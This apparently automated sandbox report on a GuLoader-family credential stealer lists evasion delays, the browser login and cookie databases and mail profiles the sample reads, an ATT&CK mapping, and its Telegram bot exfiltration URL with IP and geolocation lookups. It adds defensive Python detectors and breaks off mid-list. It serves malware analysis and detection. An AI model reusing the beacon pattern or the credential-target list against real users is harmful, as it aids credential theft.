            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 599890
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 599780
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 599671
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 599562
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 599452
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 599343
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 599234
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 599124
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 599015
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 598906
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 598796
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 598687
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 598578
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 598468
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 598304
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 598201
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 598082
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 597734
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 597334
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 597078
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 596930
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 596828
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 596718
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 596609
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 596500
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 596390
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 596281
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 596171
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 596062
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 595953
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 595843
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 595734
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 595621
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 595515
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 595406
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 595296
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 595187
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 595078
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 594968
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 594859
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 594749
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 594637
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 594531
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 594421
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 594312
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 594203
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 594093
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 593984
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 593874
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 593765
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 593656
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Window / User API: threadDelayed 1533
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Window / User API: threadDelayed 8324
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd854F.tmp\System.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | API coverage: 1.7 %
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -24903104499507879s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -599890s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 5692 | Thread sleep count: 1533 > 30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 5692 | Thread sleep count: 8324 > 30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -599780s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -599671s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -599562s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -599452s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -599343s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -599234s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -599124s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -599015s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -598906s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -598796s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -598687s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -598578s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -598468s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -598304s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -598201s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -598082s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -597734s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -597334s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -597078s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -596930s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -596828s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -596718s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -596609s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -596500s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -596390s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -596281s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -596171s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -596062s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -595953s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -595843s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -595734s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -595621s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -595515s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -595406s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -595296s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -595187s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -595078s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -594968s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -594859s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -594749s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -594637s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -594531s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -594421s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -594312s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -594203s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -594093s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -593984s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -593874s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -593765s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284 | Thread sleep time: -593656s >= -30000s
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_00402910 FindFirstFileW, 1_2_00402910
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_004069DF FindFirstFileW,FindClose, 1_2_004069DF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D8E
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 8_2_00402910 FindFirstFileW, 8_2_00402910
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 8_2_004069DF FindFirstFileW,FindClose, 8_2_004069DF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 8_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 8_2_00405D8E
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002629000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002629000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWgs
Source: OW1i3n5K3s.exe, 00000008.00000002.2478960805.00000000025D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx|c
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | API call chain: ExitProcess graph end node (graph_1-4451)
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | API call chain: ExitProcess graph end node (graph_1-4680)
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_6EDC1BFF GlobalAlloc, lstrcpyW, lstrcpyW, GlobalFree, GlobalFree, GlobalFree, GlobalFree, GlobalFree, GlobalFree, lstrcpyW, GetModuleHandleW, LoadLibraryW, GetProcAddress, lstrlenW
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Process created: C:\Users\user\Desktop\OW1i3n5K3s.exe "C:\Users\user\Desktop\OW1i3n5K3s.exe"
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Queries volume information: C:\Users\user\Desktop\OW1i3n5K3s.exe VolumeInformation
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_00403645 EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, lstrlenW, wsprintfW, GetFileAttributesW, DeleteFileW, SetCurrentDirectoryW, CopyFileW, OleUninitialize, ExitProcess, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: OW1i3n5K3s.exe PID: 8128, type: MEMORYSTR
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 00000008.00000002.2505212840.0000000032F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: OW1i3n5K3s.exe PID: 8128, type: MEMORYSTR
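The file and registry accesses in this section are the artefact set a credential stealer walks in one pass: the Chromium profile databases of Chrome and Edge (Login Data, Cookies, History, Web Data) plus the Outlook MAPI profile key and the Postbox profile directory. The block below is an added detection example, not code from the report or from the sample: it replays an API-monitor or EDR file-and-key-open trace against those paths and flags a process that is not the browser or mail client yet reads a login database together with a second store or a mail artefact. The (pid, image, target) event shape, the OWNERS allow-list and the trace at the bottom are my assumptions; the paths in the trace are copied from the rows above.

```python
import re

# Chromium-family credential stores the sample opened. The profile directory
# name (Default, Profile 1, ...) is matched generically so Chrome, Edge and
# other Chromium browsers share one pattern each.
CRED_STORE_PATTERNS = {
    "logins":  re.compile(r"\\User Data\\[^\\]+\\Login Data$", re.I),
    "cookies": re.compile(r"\\User Data\\[^\\]+\\(?:Network\\)?Cookies$", re.I),
    "history": re.compile(r"\\User Data\\[^\\]+\\History$", re.I),
    "webdata": re.compile(r"\\User Data\\[^\\]+\\Web Data$", re.I),
}
# Mail artefacts from the report: Outlook MAPI profile key, Postbox profile directory.
MAIL_PATTERNS = {
    "outlook_profile": re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\", re.I),
    "postbox_profile": re.compile(r"\\PostboxApp\\Profiles", re.I),
}
# Images that legitimately own these stores (assumed allow-list; extend per estate).
OWNERS = {"chrome.exe", "msedge.exe", "outlook.exe", "postbox.exe"}


def classify(events):
    """Aggregate (pid, image, target) open events per process and decide.

    A process is flagged when it is not an owner of the stores, reads a
    Login Data database, and additionally reads a second store (cookies,
    history, web data) or any mail artefact.
    Returns {pid: {"image": str, "cred": set, "mail": set, "stealer": bool}}.
    """
    per_pid = {}
    for pid, image, target in events:
        rec = per_pid.setdefault(pid, {"image": image, "cred": set(), "mail": set()})
        for name, pat in CRED_STORE_PATTERNS.items():
            if pat.search(target):
                rec["cred"].add(name)
        for name, pat in MAIL_PATTERNS.items():
            if pat.search(target):
                rec["mail"].add(name)
    for rec in per_pid.values():
        owner = rec["image"].lower() in OWNERS
        rec["stealer"] = (
            not owner
            and "logins" in rec["cred"]
            and (len(rec["cred"]) >= 2 or bool(rec["mail"]))
        )
    return per_pid


# Constructed trace. PID 8128 replays the report's rows; the other two
# processes are benign controls (the browser reading its own profile, and
# Explorer browsing the user directory, which the sample also did).
APPDATA = r"C:\Users\user\AppData"
SAMPLE_TRACE = [
    (8128, "OW1i3n5K3s.exe", APPDATA + r"\Local\Google\Chrome\User Data\Default\History"),
    (8128, "OW1i3n5K3s.exe", APPDATA + r"\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    (8128, "OW1i3n5K3s.exe", APPDATA + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    (8128, "OW1i3n5K3s.exe", APPDATA + r"\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (8128, "OW1i3n5K3s.exe", APPDATA + r"\Local\Microsoft\Edge\User Data\Default\History"),
    (8128, "OW1i3n5K3s.exe", APPDATA + r"\Local\Google\Chrome\User Data\Default\Web Data"),
    (8128, "OW1i3n5K3s.exe", APPDATA + r"\Local\Google\Chrome\User Data\Default\Top Sites"),
    (8128, "OW1i3n5K3s.exe", APPDATA + r"\Roaming\PostboxApp\Profiles"),
    (8128, "OW1i3n5K3s.exe", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
                             r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    (4242, "chrome.exe", APPDATA + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    (4242, "chrome.exe", APPDATA + r"\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    (1337, "explorer.exe", r"C:\Users\user"),
]

if __name__ == "__main__":
    for pid, rec in classify(SAMPLE_TRACE).items():
        print(pid, rec["image"], "STEALER" if rec["stealer"] else "ok",
              sorted(rec["cred"]), sorted(rec["mail"]))
```

The rule deliberately keys on Login Data plus one more store rather than on any single file: History and Top Sites are read by benign tooling, and Cookies alone is what a session-hijacker would take, while the stealer above reads all of them in one sweep. Top Sites is left out of the patterns because it carries no credential material.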

Remote Access Functionality

Source: Yara match | File source: 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: OW1i3n5K3s.exe PID: 8128, type: MEMORYSTR
MITRE ATT&CK matrix (one line per tactic, cells in the report's column order; a number in brackets is the count the report attaches to that technique, cells without one are unflagged matrix entries):

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
Execution: Native API [1] | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
Persistence: DLL Side-Loading [1] | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Privilege Escalation: Access Token Manipulation [1] | Process Injection [11] | DLL Side-Loading [1] | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Defense Evasion: Masquerading [11] | Disable or Modify Tools [1] | Virtualization/Sandbox Evasion [31] | Access Token Manipulation [1] | Process Injection [11] | Deobfuscate/Decode Files or Information [1] | Obfuscated Files or Information [3] | DLL Side-Loading [1]
Credential Access: OS Credential Dumping [1] | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
Discovery: Security Software Discovery [21] | Virtualization/Sandbox Evasion [31] | Application Window Discovery [1] | System Network Configuration Discovery [1] | File and Directory Discovery [4] | System Information Discovery [215] | Remote System Discovery | System Owner/User Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
Collection: Email Collection [1] | Archive Collected Data [1] | Data from Local System [1] | Clipboard Data [1] | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
Command and Control: Web Service [1] | Encrypted Channel [21] | Ingress Tool Transfer [3] | Non-Application Layer Protocol [3] | Application Layer Protocol [14] | Multiband Communication | Commonly Used Port | Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Impact: System Shutdown/Reboot [1] | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement
Source | Detection | Scanner | Label
OW1i3n5K3s.exe | 75% | Virustotal |
OW1i3n5K3s.exe | 66% | ReversingLabs | Win32.Trojan.GuLoader

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsd854F.tmp\System.dll | 0% | ReversingLabs |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://api.telegram | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.184.206 | true | false | | high
drive.usercontent.google.com | 172.217.16.129 | true | false | | high
reallyfreegeoip.org | 104.21.32.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.8.169 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:02:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
http://checkip.dyndns.org/ | false | | high
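The three contacted URLs above are the sample's pre-flight and beacon in order: checkip.dyndns.org returns the victim's public IP, reallyfreegeoip.org/xml/<ip> turns it into a country (the "Country Name: United States" in the message), and the Telegram Bot API carries the result. The bot token between /bot and /sendMessage and the chat_id are already blank in the recorded URL. The block below is an added analysis example, not code from the report or from the sample: it decodes the percent-encoded text parameter back into the beacon fields and flags a client that performs the three-step sequence in a proxy log. The log line layout (timestamp client method url), the sample lines and the stage logic are my assumptions; the beacon URL is the one recorded above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# api.telegram.org/bot<token>/<method>; the token may be empty, as in the report.
TELEGRAM_BOT = re.compile(r"^https?://api\.telegram\.org/bot[^/]*/(?P<method>\w+)", re.I)
IP_LOOKUP = re.compile(r"^https?://checkip\.dyndns\.(?:org|com)/?$", re.I)
GEO_LOOKUP = re.compile(r"^https?://reallyfreegeoip\.org/xml/", re.I)

# The sendMessage URL recorded in the report (token and chat_id blank).
BEACON_URL = (
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537"
    "%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:02:15%0D%0ACountry%20Name:%20United%20States"
    "%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean"
    "%20the%20system%20storage's%20empty.%20%5D"
)


def decode_beacon(url):
    """Return (method, chat_id, fields) for a Telegram bot call, else None.

    fields maps the "Key: value" lines of the message text; lines without a
    colon (the banner in square brackets) are collected under "_banner".
    """
    m = TELEGRAM_BOT.match(url)
    if not m:
        return None
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    text = qs.get("text", [""])[0]
    fields = {}
    for line in text.replace("\r\n", "\n").split("\n"):
        line = line.strip()
        if not line:
            continue
        if ":" in line:
            key, value = line.split(":", 1)   # first colon only: the timestamp has colons
            fields[key.strip()] = value.strip()
        else:
            fields.setdefault("_banner", []).append(line)
    return m.group("method"), qs.get("chat_id", [""])[0], fields


def find_beacon_chains(log_lines):
    """Per client, require IP lookup -> geolocation -> Telegram bot call, in order.

    Returns {client: [url, url, url]} for clients that completed the chain.
    """
    stage, chains = {}, {}
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        s = stage.get(client, 0)
        if s == 0 and IP_LOOKUP.match(url):
            stage[client], chains[client] = 1, [url]
        elif s == 1 and GEO_LOOKUP.match(url):
            stage[client] = 2
            chains[client].append(url)
        elif s == 2 and TELEGRAM_BOT.match(url):
            stage[client] = 3
            chains[client].append(url)
    return {c: urls for c, urls in chains.items() if stage[c] == 3}


# Constructed proxy log (timestamp client method url). Only 10.0.0.5 runs the
# full chain; 10.0.0.7 stops after the IP lookup and 10.0.0.9 talks to the
# Bot API without the preceding lookups.
SAMPLE_LOG = [
    "2025-03-09T01:02:05Z 10.0.0.5 GET http://checkip.dyndns.org/",
    "2025-03-09T01:02:07Z 10.0.0.5 GET https://reallyfreegeoip.org/xml/8.46.123.189",
    "2025-03-09T01:02:15Z 10.0.0.5 POST " + BEACON_URL,
    "2025-03-09T01:03:00Z 10.0.0.7 GET http://checkip.dyndns.org/",
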